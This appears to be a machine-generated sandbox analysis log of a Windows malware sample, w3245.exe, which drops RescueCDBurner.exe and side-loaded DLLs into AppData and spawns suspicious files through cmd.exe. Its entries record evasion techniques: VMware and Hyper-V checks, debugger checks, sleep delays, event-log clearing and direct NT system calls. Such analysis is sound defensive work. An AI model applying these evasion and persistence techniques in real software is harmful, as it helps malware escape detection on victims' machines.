Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000002.00000003.1693692874.0000000001812000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715594343.000000006BD71000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000003.00000002.1776456470.000000006B031000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000002.00000002.1715727918.000000006BE31000.00000020.00000001.01000000.0000000C.sdmp, RescueCDBurner.exe, 00000003.00000002.1777432976.000000006CBE1000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000002.00000002.1715404801.000000000A8B0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000002.00000002.1715225657.000000000A555000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775652774.000000000A420000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775526982.000000000A0CD000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1775805982.000000000A7D7000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045741846.0000000005170000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2045008302.0000000004896000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2372737686.0000000005D30000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000003.1697883667.000000000AC94000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000000.1700601668.0000000000684000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000002.00000002.1701709973.0000000000B14000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000002.00000000.1680920724.0000000000B14000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000002.00000002.1717094583.000000006CAD1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000003.00000002.1777831407.000000006CDC1000.00000020.00000001.01000000.00000011.sdmp
Source: w3245.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: w3245.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: w3245.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: w3245.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: w3245.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: lshbkgxootar.12.dr | Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: QtCore4.dll.1.dr | Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: QtCore4.dll.2.dr | Static PE information: real checksum: 0x283beb should be: 0x284aa4
Source: Fondue.dll.1.dr | Static PE information: real checksum: 0x34dc9 should be: 0x3baae
Source: xbsvw.4.dr | Static PE information: real checksum: 0x2865d3 should be: 0x28b45f
Source: StarBurn.dll.1.dr | Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: StarBurn.dll.2.dr | Static PE information: real checksum: 0xa4afa should be: 0xab76c
Source: w3245.exe | Static PE information: section name: .wixburn
Source: w3245.exe.0.dr | Static PE information: section name: .wixburn
Source: LocalCtrl_alpha_v3.exe.4.dr | Static PE information: section name: Shared
Source: xbsvw.4.dr | Static PE information: section name: .xdata
Source: xbsvw.4.dr | Static PE information: section name: gjwrx
Source: lshbkgxootar.12.dr | Static PE information: section name: .xdata
Source: lshbkgxootar.12.dr | Static PE information: section name: gjwrx
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007EEAD6 push ecx; ret 0_2_007EEAE9
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A2EAD6 push ecx; ret 1_2_00A2EAE9
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BD8B658 push ecx; ret 2_2_6BD8B66B
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BD80CC5 push ecx; ret 2_2_6BD80CD8
Source: msvcr100.dll.1.dr | Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.1.dr | Static PE information: section name: .text entropy: 6.9340411158815725
Source: msvcr100.dll.2.dr | Static PE information: section name: .text entropy: 6.9169969425576285
Source: StarBurn.dll.2.dr | Static PE information: section name: .text entropy: 6.9340411158815725
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtXml4.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\xbsvw
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtGui4.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\lshbkgxootar
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\StarBurn.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\msvcp100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtNetwork4.dll
Source: C:\Users\user\Desktop\w3245.exe | File created: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | File created: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\QtCore4.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | File created: C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB43AA1 _StartService_@12,lstrlenW,GlobalAlloc,WideCharToMultiByte,StartServiceA,MultiByteToWideChar,GlobalFree,1_2_5BB43AA1
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\XBSVW
Source: C:\Windows\SysWOW64\cmd.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LSHBKGXOOTAR
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3DE09 _ClearEventLog_@8,SetLastError,newMultiByteFromWideChar,ClearEventLogA,GlobalFree,1_2_5BB3DE09
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDCA3DD GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,GetLastError,Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error,_CxxThrowException,GetModuleHandleW,GetProcAddress,GetLastError,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,2_2_6BDCA3DD

Malware Analysis System Evasion

Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6CEC7C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6CEC7C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6CEC7945
Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 6CEC3B54
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6B937C44
Source: C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe | API/Special instruction interceptor: Address: 6B937945
Source: C:\Windows\SysWOW64\cmd.exe | API/Special instruction interceptor: Address: 6B933B54
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: _EnumServicesStatus_@32,lstrlenW,GlobalAlloc,lstrlenW,GlobalAlloc,GlobalAlloc,WideCharToMultiByte,WideCharToMultiByte,EnumServicesStatusA,MultiByteToWideChar,GlobalFree,MultiByteToWideChar,GlobalFree,1_2_5BB42F59
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Dropped PE file which has not been started: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\Fondue.dll
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xbsvw
Source: C:\Windows\SysWOW64\cmd.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lshbkgxootar
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Evaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Evaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Evaded block: after key decision
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\user\Desktop\w3245.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | API coverage: 4.6 %
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe TID: 7084 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2288 | Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe TID: 2708 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 007FFF61h 0_2_007FFEC6
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007FFEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 007FFF5Ah 0_2_007FFEC6
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 05h and CTI: je 00A3FF61h 1_2_00A3FEC6
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A3FEC6 GetLocalTime followed by cmp: cmp dword ptr [ebp+08h], 01h and CTI: je 00A3FF5Ah 1_2_00A3FEC6
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007C3CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_007C3CC4
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_00804440 FindFirstFileW,FindClose,0_2_00804440
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007D9B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,0_2_007D9B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A44440 FindFirstFileW,FindClose,1_2_00A44440
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A19B43 FindFirstFileW,lstrlenW,FindNextFileW,FindClose,1_2_00A19B43
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A03CC4 GetFileAttributesW,GetLastError,GetLastError,SetFileAttributesW,GetLastError,GetTempPathW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,DeleteFileW,GetTempFileNameW,MoveFileExW,MoveFileExW,MoveFileExW,FindNextFileW,GetLastError,GetLastError,GetLastError,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,1_2_00A03CC4
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3D32E _FindFirstFileEx_@24,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3D32E
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3D43A _FindFirstFile_@8,SetLastError,memset,newMultiByteFromWideChar,FindFirstFileA,MultiByteToWideChar,MultiByteToWideChar,GlobalFree,1_2_5BB3D43A
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BD981A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,2_2_6BD981A1
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDCC8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,2_2_6BDCC8FD
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDCCC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,2_2_6BDCCC23
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3AFDD _GetLogicalDriveStrings_@8,SetLastError,newMultiByteFromWideCharSize,GetLogicalDriveStringsA,ConvertMultiSZNameToW,GlobalFree,1_2_5BB3AFDD
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_008097A5 VirtualQuery,GetSystemInfo,0_2_008097A5
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: VMware
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noreply@vmware.com0
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0
Source: RescueCDBurner.exe, 00000002.00000003.1694979185.000000000AC96000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: [ed'ee.?AVQEmulationPaintEngine@@0/
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1!0
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: http://www.vmware.com/0/
Source: LocalCtrl_alpha_v3.exe, 0000000A.00000003.2147091856.0000000000652000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.1
Source: RescueCDBurner.exe, 00000003.00000002.1777108025.000000006B89F000.00000008.00000001.01000000.00000015.sdmp | Binary or memory string: jkd'tk.?AVQEmulationPaintEngine@@0/ k
Source: cmd.exe, 00000004.00000002.2045312559.0000000004C42000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware, Inc.0
Source: RescueCDBurner.exe, 00000003.00000002.1771084041.0000000000684000.00000002.00000001.01000000.00000010.sdmp | Binary or memory string: <&version=&md5=&newsize=&registercode=&registertime=&langStr=&fname=&lname=&email=&activecode=action=wbrb\\.\PhysicalDrive0VMwareb71710ea1f7bf1b2
Source: RescueCDBurner.exe, 00000002.00000002.1716542897.000000006C6AF000.00000008.00000001.01000000.0000000E.sdmp | Binary or memory string: Kld'Ul.?AVQEmulationPaintEngine@@0/
Source: RescueCDBurner.exe, 00000002.00000002.1716542897.000000006C6AF000.00000008.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000002.00000003.1694979185.000000000AC96000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1777108025.000000006B89F000.00000008.00000001.01000000.00000015.sdmp | Binary or memory string: .?AVQEmulationPaintEngine@@
Source: C:\Users\user\Desktop\w3245.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EE88A
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_5BB3CB21 _GetDiskFreeSpaceEx_@16,GetVersionExA,SetLastError,newMultiByteFromWideChar,LoadLibraryW,GetProcAddress,FreeLibrary,GlobalFree,1_2_5BB3CB21
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007F48D8 mov eax, dword ptr fs:[00000030h] 0_2_007F48D8
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A348D8 mov eax, dword ptr fs:[00000030h] 1_2_00A348D8
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007C394F GetProcessHeap,RtlAllocateHeap,0_2_007C394F
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007EE3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007EE3D8
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007EE88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007EE88A
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007EE9DC SetUnhandledExceptionFilter,0_2_007EE9DC
Source: C:\Users\user\Desktop\w3245.exe | Code function: 0_2_007F3C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007F3C76
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A2E3D8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00A2E3D8
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A2E88A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A2E88A
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A2E9DC SetUnhandledExceptionFilter,1_2_00A2E9DC
Source: C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe | Code function: 1_2_00A33C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00A33C76
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BD807A7 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,2_2_6BD807A7
Source: C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe | Code function: 2_2_6BDFAD2C _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,2_2_6BDFAD2C

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x14011D93E
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF6693C7FFF
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF66920F709
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtMapViewOfSection: Direct from: 0x7FF66923F5AA
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6691B3D92
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF6692A3F0C
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Indirect: 0x14012000F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF66924CB90
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtCreateFile: Direct from: 0x7FF66925352F
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtClose: Direct from: 0x7FF6693C800D
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryValueKey: Direct from: 0x7FF6692764A6
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtOpenKeyEx: Direct from: 0x7FF669275EEC
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtQueryInformationProcess: Direct from: 0x7FF669258418
Source: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe | NtAllocateVirtualMemory: Direct from: 0x7FF669329C73
